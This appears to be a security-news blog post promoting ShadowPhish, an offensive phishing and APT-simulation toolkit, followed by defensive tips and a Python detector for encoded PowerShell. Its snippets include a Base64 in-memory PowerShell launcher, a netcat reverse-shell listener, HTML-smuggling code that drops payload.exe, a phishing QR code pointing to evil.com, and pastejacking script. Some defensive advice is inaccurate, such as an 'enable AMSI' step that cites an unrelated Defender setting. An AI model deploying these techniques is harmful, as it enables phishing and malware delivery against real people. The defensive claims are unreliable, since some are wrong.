ShadowPhish – APT Awareness Toolkit


ShadowPhish is a Red Team toolkit designed to simulate advanced social engineering techniques used by APT (Advanced Persistent Threat) groups. Created by Joas A Santos, this tool helps security professionals understand and defend against sophisticated phishing and malware delivery methods.

Features:

✅ Malicious PDF Generator – Creates weaponized PDFs for exploitation.
✅ Word Macro with Remote Shellcode – Embeds malicious macros in Word documents.
✅ PowerShell Obfuscation – Uses Base64, IEX, compression, and variable manipulation.
✅ Remote VBS + Embedded HTTP Server – Executes VBS scripts with a built-in server.
✅ Prebuilt Phishing Websites – Includes `.sites/` directory (compatible with ZPhisher).
✅ Fake Recaptcha (PasteJack Style) – Mimics CAPTCHA to steal credentials.
✅ Deepfake Video (FaceFusion) & DeepVoice TTS – Generates synthetic media for deception.
✅ Payload Generator – Creates payloads for Windows, Linux, and macOS.
✅ Built-in Reverse Shell Listener – Provides command interface for post-exploitation.
✅ APT Chains (APT29, APT41, FIN7) – Simulates known APT attack patterns.
✅ Smishing (SMS) & Vishing (Twilio Calls) – Phone-based social engineering.
✅ Malicious LNK Shortcut Builder – Crafted shortcuts for initial access.
✅ HTML Smuggling Generator – Embeds payloads in Base64 HTML.
✅ Simulated Ransomware + Decryptor – Demonstrates ransomware behavior.
✅ QR Code Phishing Generator – Malicious QR codes for attacks.

🔗 Tool Link: https://lnkd.in/dwRTjx4d
🔗 ZPhisher Sites: https://lnkd.in/dpx7nuFG

You Should Know:

1. Malicious PDF Generation

# Inspect a generated PDF: pdftotext dumps the page text for review, while the exploitation vector is the embedded JavaScript
pdftotext -l 1 -f 1 malicious.pdf output.txt

2. PowerShell Obfuscation

# Base64-encoded PowerShell payload (UTF-16LE text, decoded and run in memory via IEX)
$encoded = "<BASE64_PAYLOAD>"
Invoke-Expression ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded)))

3. Reverse Shell Listener (Netcat)

# Start a listener for incoming shells
nc -lvnp 4444

4. HTML Smuggling Payload

<!-- Embed a malicious payload in HTML -->

<script>
var payload = "BASE64_ENCODED_PAYLOAD";
var blob = new Blob([atob(payload)], {type: "application/octet-stream"});
var url = URL.createObjectURL(blob);
var a = document.createElement("a");
a.href = url;
a.download = "payload.exe";
a.click();
</script>

5. QR Code Phishing

# Generate a QR code linking to a malicious URL
qrencode -o phishing.png "https://evil.com/login"

6. Fake Recaptcha (PasteJacking)

// Pastejacking: the fake CAPTCHA page hooks the copy event and replaces whatever the user copies with attacker-chosen text
document.addEventListener('copy', (e) => {
e.clipboardData.setData('text/plain', 'stolen_data');
e.preventDefault();
});

What Undercode Say:

ShadowPhish is a powerful toolkit for simulating APT attacks, emphasizing the need for robust defensive measures. Key takeaways:
– Monitor PowerShell execution (Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational").
– Detect malicious PDFs with `pdfid.py` (from Didier Stevens).
– Block suspicious LNK files via GPO (DisableShortcutCreation).
– Analyze network traffic for HTML smuggling (tcpdump -i eth0 -w capture.pcap).
– Use YARA rules to detect APT payloads (yara -r apt_rules.yar /malware).
– Enable AMSI for PowerShell protection (Set-MpPreference -DisableRealtimeMonitoring $false).
– Log Twilio API calls if vishing is suspected.
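Putting the first takeaway into practice, here is an added example (not part of ShadowPhish or the original post) that triages PowerShell ScriptBlock text for the Base64 + IEX launcher shape shown in the obfuscation section and decodes the payload for review. The sample script blocks are constructed; in production the text would come from event 4104 entries in the Microsoft-Windows-PowerShell/Operational log.

```python
import base64
import re

# Heuristics for the launcher shape shown above: a long Base64 literal,
# a FromBase64String decode, and Invoke-Expression (or its IEX alias).
B64_LITERAL_RE = re.compile(r'"([A-Za-z0-9+/]{40,}={0,2})"')
DECODE_RE = re.compile(r"FromBase64String", re.IGNORECASE)
IEX_RE = re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.IGNORECASE)


def decode_payload(literal):
    """Decode a Base64 literal the way the launcher does: UTF-16LE first
    (matching [Text.Encoding]::Unicode), then UTF-8. Returns None if
    neither yields plain ASCII script text."""
    raw = base64.b64decode(literal, validate=True)
    for encoding in ("utf-16-le", "utf-8"):
        try:
            text = raw.decode(encoding)
        except UnicodeDecodeError:
            continue
        if text.isascii():  # PowerShell launchers are ASCII; filters false decodes
            return text
    return None


def analyze_script_block(script_text):
    """Return a finding for one ScriptBlock text, or None if not suspicious."""
    if not (DECODE_RE.search(script_text) and IEX_RE.search(script_text)):
        return None
    decoded = [p for p in map(decode_payload, B64_LITERAL_RE.findall(script_text)) if p]
    return {"indicators": ["FromBase64String", "Invoke-Expression"], "decoded": decoded}


# Constructed sample ScriptBlock texts (not real log data). The encoded
# command is harmless and is built here so the example runs offline.
SAMPLE_COMMAND = "Write-Host 'constructed sample'"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_COMMAND.encode("utf-16-le")).decode()
SAMPLE_SCRIPT_BLOCKS = [
    f'$encoded = "{SAMPLE_ENCODED}"\n'
    "Invoke-Expression ([System.Text.Encoding]::Unicode.GetString("
    "[System.Convert]::FromBase64String($encoded)))",
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
]

if __name__ == "__main__":
    for block in SAMPLE_SCRIPT_BLOCKS:
        print(analyze_script_block(block))
```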

Expected Output:

A fully simulated APT attack chain, including phishing, payload delivery, and post-exploitation, with defensive countermeasures.


References:

Reported By: Joas Antonio – Hackers Feeds